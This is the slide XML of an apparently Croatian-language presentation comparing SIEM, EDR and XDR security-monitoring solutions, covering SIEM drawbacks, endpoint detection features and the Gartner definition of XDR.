          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="587052" y="2452944"/>
            <a:ext cx="8190889" cy="4355209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203803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37C95-1857-879D-2858-39C2094DE741}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="hr-HR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1031" name="Picture 2" descr="Slikovni rezultat za ueba">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C4F88BC-04D5-4BFC-8416-30D927CFA4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85118" y="1825625"/>
            <a:ext cx="697376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likovni rezultat za ueba">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4168B3A4-75FC-4275-BAB4-BE9825770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012031"/>
            <a:ext cx="9144000" cy="48339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E53DE65-8025-48B0-825E-FF1AE4A3C004}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="1940835"/>
            <a:ext cx="5472608" cy="3648405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428327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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1031"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8"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AR vs. SIEM: What's the Difference | Threat Hunting Guide">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D878F3A3-1E94-03C6-5626-ED8F79A2F75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488" y="273677"/>
            <a:ext cx="8963025" cy="5691521"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2895966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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS"/>
              <a:t>Nedostatci SIEM rješenja</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60418" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>implementacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>istih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>često</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vrlo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kompleksna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>skupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>te</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zahtjevna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resursima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> različiti modeli licenciranja</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Sklonost klijenata prema cloud rješenjima</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Rastuća potražnja za više sigurnosnih podataka (napuhavanje troškova)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Potreba za jednostavnijom detekcijom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
              <a:solidFill>
                <a:srgbClr val="262626"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
              <a:solidFill>
                <a:srgbClr val="262626"/>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BAAE-3A93-4994-BF81-E358F55F223E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Otvoreno pitanje</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A91A69B8-4B0B-4EA4-9801-AF711FD4A140}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Despite this central role, security operations center (SOC) teams now surround the SIEM with additional tools for threat detection/response, investigations/query, threat intelligence analysis, and process automation/orchestration. </a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>This raises the question: If SIEM is essential to security analytics and operations, why do organizations need so many tools? </a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21639452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A7418C-19B4-44ED-9887-AE98DC1DB2F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>EDR (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>Endpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4930A752-5D36-4162-A43C-C67D3D1A4D72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Sastavni dio EPP rješenja</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Detaljno bilježenje svih aktivnosti na osobnim računalima/poslužiteljima (npr. izmjene na </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>registry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>, URL, IP, pokrenuti proces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Fokus na učinkovitu detekciju sigurnosnih incidenata</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Uskladivost s MITRE ATT&amp;CK okvirom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Izolacija računala/proces/aplikacija u svrhu rješavanja sigurnosnih incidenata</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Učinkovite istrage (engl. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>hunting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Automatizacija</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2267985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8DD559-A01F-AB54-D103-394F760C5906}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="hr-HR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0298EFD-1B00-4236-C6E2-569C5ED6342D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="hr-HR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://www.carbonblack.com/wp-content/uploads/2017/04/BanHash-B.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{644A72DB-AC2A-4DA2-8AC0-038063904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3388"/>
            <a:ext cx="9144000" cy="599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2699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1756CE-FAF1-428D-8562-50A3AAFB8312}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>XDR (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>Extended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rezervirano mjesto sadržaja 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E362361-550D-446D-9385-6A2E43E55629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Gartner: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“unified security incident detection and response platform that automatically collects and correlates data from multiple proprietary security components.”</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>XDR omogućuje prikupljanje, tijesnu integraciju te naprednu analitiku podataka</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Izvori podataka: osobna računala/poslužitelji, mrežni promet (NTA), email/web, imenički servisi, cloud,…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Napredna analitika na </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>machine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>learning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> načelima</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Automatizacija odgovora na incidente (SOAR funkcionalnosti)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Naprednija detekcija kroz tijesnu integraciju događaja s različitih izvora </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>--&gt; kreiranje incidenata koji bi inače bili zanemareni</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Smanjenje broja sigurnosnih događaja uslijed naprednije analitike/konteksta (npr. analiza mrežnih i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>endpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> događaja)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1655540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2E552D-86C1-41BE-B892-4F8D8C95FA01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>XDR (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>Extended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="What does a good XDR solution include? &#10;Al.'Malytiæ &#10;Busin ess &#10;Gartner ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0F77216-D126-4D79-9247-E67C7AB3B0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47664" y="1778866"/>
            <a:ext cx="5119943" cy="3762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186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E802AD-3F74-41D4-A012-E04F4AE75C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>XDR (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>Extended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rezervirano mjesto sadržaja 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11760384-1794-49A3-B7F5-80D114C37DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>XDR je zapravo ono što je SIEM trebao biti</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>XDR pokriva prva dva SIEM scenarija</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Napredna sigurnosna analitika u svrhu otkrivanja sigurnosnih anomalija/događaja odnosno pravovremenog otkrivanja incidenata</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Odgovor na incidente – automatizacija i forenzika</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>SIEM = XDR + Log management</a:t>
            </a:r>
          </a:p>
